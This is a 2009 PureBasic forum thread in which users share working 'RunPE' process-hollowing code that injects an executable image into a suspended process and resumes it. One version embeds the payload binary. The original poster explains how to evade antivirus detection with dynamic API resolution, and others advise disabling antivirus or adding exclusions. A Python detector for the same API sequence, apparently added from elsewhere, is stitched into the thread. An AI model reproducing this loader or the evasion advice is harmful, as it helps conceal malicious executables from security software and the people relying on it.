Simple: 'RunPE'

Posted: Mon Jun 01, 2009 9:43 pm
by hipy001
Simple: 'RunPE' "Execute from memory"
Works: tested on Windows SP3, Windows Vista and Windows 7

Structure IMAGE_SECTION_HEADER
  SecName.b[8]
  StructureUnion
    PhysicalAddr.l
    VirtualSize.l
  EndStructureUnion
  VirtualAddress.l
  SizeOfRawData.l
  PointerToRawData.l
  PointerToRelocations.l
  PointerToLinenumbers.l
  NumberOfRelocations.w
  NumberOfLinenumbers.w
  Characteristics.l
EndStructure

Structure IMAGE_SECTION_HEADERS
  ish.IMAGE_SECTION_HEADER[95]
EndStructure

Procedure RunPE(sProc.s, lBuff)

  *idh.IMAGE_DOS_HEADER  = lBuff
  *ish.IMAGE_SECTION_HEADERS
  pi.PROCESS_INFORMATION
  *inh.IMAGE_NT_HEADERS
  si.STARTUPINFO
  lpBaseAddres.l
  Ctx.CONTEXT
  Addr.l
  ret.l
  i.l
  
  CreateProcess_(#NUL, sProc, #NUL, #NUL, #False, #CREATE_SUSPENDED, #NUL, #NUL, @si, @pi)
  Ctx\ContextFlags = #CONTEXT_INTEGER
  If GetThreadContext_(pi\hThread, Ctx) = 0      : Goto EndThread : EndIf
  
  ReadProcessMemory_(pi\hProcess, Ctx\Ebx + 8, @Addr, 4, #NUL)
  If ZwUnmapViewOfSection_(Pi\hProcess, Addr)    : Goto EndThread : EndIf
  If lBuff = 0                                   : Goto EndThread : EndIf
  *inh = lBuff + *idh\e_lfanew
  
  lpBaseAddres = VirtualAllocEx_(pi\hProcess, *inh\OptionalHeader\ImageBase, *inh\OptionalHeader\SizeOfImage, #MEM_COMMIT | #MEM_RESERVE, #PAGE_EXECUTE_READWRITE)
  WriteProcessMemory_(pi\hProcess, lpBaseAddres, lBuff, *inh\OptionalHeader\SizeOfHeaders, @ret)
  *ish = *inh\OptionalHeader + *inh\FileHeader\SizeOfOptionalHeader
  
  For i = 0 To *inh\FileHeader\NumberOfSections - 1
    WriteProcessMemory_(pi\hProcess, lpBaseAddres + *ish\ish[i]\VirtualAddress, lBuff + *ish\ish[i]\PointerToRawData, *ish\ish[i]\SizeOfRawData, @ret)
  Next
  
  WriteProcessMemory_(pi\hProcess, Ctx\Ebx + 8, @lpBaseAddres, 4, #NUL)
  Ctx\Eax = lpBaseAddres + *inh\OptionalHeader\AddressOfEntryPoint
  SetThreadContext_(pi\hThread, Ctx)
  ResumeThread_(pi\hThread)
  End
  
  EndThread:
  TerminateProcess_(pi\hProcess, #NUL)
  CloseHandle_(pi\hThread)
  CloseHandle_(pi\hProcess)
EndProcedure

Procedure Run()
  If ReadFile(0, "C:\1.exe") = 0 : End : EndIf
  lBuf = AllocateMemory(Lof(0))
  ReadData(0, lBuf, Lof(0))
  CloseFile(0)
  ;-----------------------
  File.s = Space(1024)
  GetModuleFileName_(0, File, 1024)
  RunPE(File, lBuf)
EndProcedure

Run()

Posted: Tue Jun 02, 2009 1:51 am
by idle
That's been asked for a few times.
Thanks could be useful.

Posted: Tue Jun 02, 2009 2:11 am
by DoubleDutch
Thanks. :)

Posted: Tue Jun 02, 2009 5:52 am
by fsw
Welcome "AntiVirus Program Activator" :x

This code works as well as the other ones:

http://www.purebasic.fr/english/viewtop ... 2&start=90

Some Antivirus Programs identify it as a virus :shock:

Posted: Tue Jun 02, 2009 12:56 pm
by +18
Why did this error occur for me?

Tested on: 4.30 + XP SP3

Posted: Tue Jun 02, 2009 1:04 pm
by DoubleDutch
Turn off your antivirus - it is blocking the linking of the file.

Posted: Tue Jun 02, 2009 1:45 pm
by ts-soft
fsw wrote: This code works as well as the other ones:

http://www.purebasic.fr/english/viewtop ... 2&start=90
No, the difference is that this program works; the other doesn't work on most PCs.

The problem with antivirus is another thing.

Posted: Tue Jun 02, 2009 5:55 pm
by SFSxOI
All you need to do for the antivirus is add it to the antivirus exclusions so it won't be scanned.

Is there an example of real world usage someone could show us? I'm still not clear on the usefulness of executing a .exe in memory like this.

Posted: Tue Jun 02, 2009 5:58 pm
by +18
This error is very eccentric.
If I make an exe from this code, it works, but running it directly from the compiler doesn't work.

Thanks to hipy001 for sharing this cool code
It would be better if the masters provided an improvement to it :D

Posted: Tue Jun 02, 2009 7:01 pm
by Trond
I've always wondered whether it was simply possible to shellexecute a named pipe for this purpose.

Posted: Tue Jun 02, 2009 7:24 pm
by hipy001
If you want antivirus not to detect it, change all APIs to:

Ex:
OpenLibrary(0, "kernel32.dll")
lsAllocEx = GetFunction(0, "VirtualAllocEx")
CloseLibrary(0)

CallFunctionFast(lsAllocEx , ...................)

:wink:

Sorry for my bad English :(

Posted: Tue Jun 02, 2009 7:59 pm
by fsw
Assuming that ZwUnmapViewOfSection is the one causing the AV troubles maybe changing it to NtUnmapViewOfSection would help.

Because MSDN says:
Note If the call to this function occurs in user mode, you should use the name "NtUnmapViewOfSection" instead of "ZwUnmapViewOfSection".
EDIT:
Just tried this and "Avira Antivir Personal" still goes off :cry:

Posted: Tue Jun 02, 2009 9:29 pm
by ts-soft
Here is a small enhancement with parameters:

First, the included test.exe:

Define.s para1, para2
para1 = ProgramParameter()
para2 = ProgramParameter()

OpenWindow(0, #PB_Ignore, #PB_Ignore, 140, 50, para1, #PB_Window_SystemMenu)

TextGadget(#PB_Any, 10, 10, 120, 20, para2)

Repeat : Until WaitWindowEvent() = #PB_Event_CloseWindow
Here is the modified RunPE(lBuff, parameters.s):

EnableExplicit

Structure IMAGE_SECTION_HEADER
  SecName.b[8]
  StructureUnion
    PhysicalAddr.l
    VirtualSize.l
  EndStructureUnion
  VirtualAddress.l
  SizeOfRawData.l
  PointerToRawData.l
  PointerToRelocations.l
  PointerToLinenumbers.l
  NumberOfRelocations.w
  NumberOfLinenumbers.w
  Characteristics.l
EndStructure

Structure IMAGE_SECTION_HEADERS
  ish.IMAGE_SECTION_HEADER[95]
EndStructure

Procedure RunPE(lBuff, parameters.s)
  Protected *idh.IMAGE_DOS_HEADER  = lBuff
  Protected *ish.IMAGE_SECTION_HEADERS
  Protected pi.PROCESS_INFORMATION
  Protected *inh.IMAGE_NT_HEADERS
  Protected si.STARTUPINFO
  Protected lpBaseAddres.l
  Protected Ctx.CONTEXT
  Protected Addr.l, ret.l, i.l

  CreateProcess_(#NUL, ProgramFilename() + " " + parameters, #NUL, #NUL, #False, #CREATE_SUSPENDED, #NUL, #NUL, @si, @pi)
  Ctx\ContextFlags = #CONTEXT_INTEGER
  If GetThreadContext_(pi\hThread, Ctx) = 0      : Goto EndThread : EndIf
 
  ReadProcessMemory_(pi\hProcess, Ctx\Ebx + 8, @Addr, 4, #NUL)
  If ZwUnmapViewOfSection_(Pi\hProcess, Addr)    : Goto EndThread : EndIf
  If lBuff = 0                                   : Goto EndThread : EndIf
  *inh = lBuff + *idh\e_lfanew
 
  lpBaseAddres = VirtualAllocEx_(pi\hProcess, *inh\OptionalHeader\ImageBase, *inh\OptionalHeader\SizeOfImage, #MEM_COMMIT | #MEM_RESERVE, #PAGE_EXECUTE_READWRITE)
  WriteProcessMemory_(pi\hProcess, lpBaseAddres, lBuff, *inh\OptionalHeader\SizeOfHeaders, @ret)
  *ish = *inh\OptionalHeader + *inh\FileHeader\SizeOfOptionalHeader
 
  For i = 0 To *inh\FileHeader\NumberOfSections - 1
    WriteProcessMemory_(pi\hProcess, lpBaseAddres + *ish\ish[i]\VirtualAddress, lBuff + *ish\ish[i]\PointerToRawData, *ish\ish[i]\SizeOfRawData, @ret)
  Next
 
  WriteProcessMemory_(pi\hProcess, Ctx\Ebx + 8, @lpBaseAddres, 4, #NUL)
  Ctx\Eax = lpBaseAddres + *inh\OptionalHeader\AddressOfEntryPoint
  SetThreadContext_(pi\hThread, Ctx)
  ResumeThread_(pi\hThread)
  ProcedureReturn 
 
  EndThread:
  TerminateProcess_(pi\hProcess, #NUL)
  CloseHandle_(pi\hThread)
  CloseHandle_(pi\hProcess)
EndProcedure

DataSection
  file: IncludeBinary "test.exe"
EndDataSection

RunPE(?file, "para1 para2")
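A defender-side counterpart to the sequence both RunPE versions perform (an added example, not code from the thread or from PureBasic): it scans an API-call trace for the CreateProcess(CREATE_SUSPENDED), unmap, RWX VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread chain in that order. The trace format, pids and addresses are constructed assumptions, not output of any real monitor.

```python
import re

# Constructed sample API trace (not from the thread), one call per line, as a
# user-mode call monitor might log it: "<caller pid> <api>(key=value, ...)".
SAMPLE_TRACE = """\
4100 CreateProcessW(flags=0x4, child_pid=4212)
4100 ZwUnmapViewOfSection(pid=4212, base=0x400000)
4100 VirtualAllocEx(pid=4212, addr=0x400000, prot=0x40)
4100 WriteProcessMemory(pid=4212, addr=0x400000, size=0x400)
4100 SetThreadContext(pid=4212)
4100 ResumeThread(pid=4212)
5200 CreateProcessW(flags=0x4, child_pid=5300)
5200 ResumeThread(pid=5300)
"""
CREATE_SUSPENDED = 0x4          # dwCreationFlags bit used in the thread's code
PAGE_EXECUTE_READWRITE = 0x40   # flProtect the thread's VirtualAllocEx requests
# Stages of the RunPE sequence, in the order the thread's code performs them.
STAGES = ["unmap", "alloc_rwx", "write", "set_context", "resume"]
LINE_RE = re.compile(r"^(\d+) (\w+)\((.*)\)$")

def parse_line(line):
    """Parse one trace line into (caller pid, api name, {arg: value}) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    pid, api, args = m.groups()
    return int(pid), api, dict(a.split("=", 1) for a in args.split(", ") if "=" in a)
def classify(api, kv):
    # Map one call made on a target process to a hollowing stage, or None.
    if api in ("ZwUnmapViewOfSection", "NtUnmapViewOfSection"):
        return "unmap"
    if api == "VirtualAllocEx" and int(kv.get("prot", "0"), 16) == PAGE_EXECUTE_READWRITE:
        return "alloc_rwx"
    return {"WriteProcessMemory": "write", "SetThreadContext": "set_context",
            "ResumeThread": "resume"}.get(api)
def detect_hollowing(trace):
    """Return [(parent_pid, child_pid)] for each suspended child that is then
    unmapped, RWX-allocated, written, re-pointed and resumed, in that order."""
    parent, progress, hits = {}, {}, []
    for pid, api, kv in filter(None, map(parse_line, trace.splitlines())):
        if api.startswith("CreateProcess"):
            if int(kv.get("flags", "0"), 16) & CREATE_SUSPENDED:
                parent[int(kv["child_pid"])] = pid   # remember suspended children
            continue
        child = int(kv.get("pid", "0"))
        if child in parent and classify(api, kv) == STAGES[progress.get(child, 0)]:
            progress[child] = progress.get(child, 0) + 1
            if progress[child] == len(STAGES):
                hits.append((parent.pop(child), child))   # full chain seen once
    return hits
```

The second process in the sample is created suspended and simply resumed, as a debugger would do, and is not reported; only the full ordered chain counts.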


Posted: Thu Jun 04, 2009 11:11 am
by SFSxOI
Whenever I try to use this I always get an error that the app failed to start because MSVCR80.dll was not found (which is a kinda odd and unexpected error). Works OK with the test.exe above, but for any other .exe I get this error. Is that normal for this? Running Vista, and running the code in admin mode.

Posted: Thu Jun 18, 2009 10:33 pm
by cas
Can we modify this code to allow loading and opening a DLL from memory? :roll:

Thanks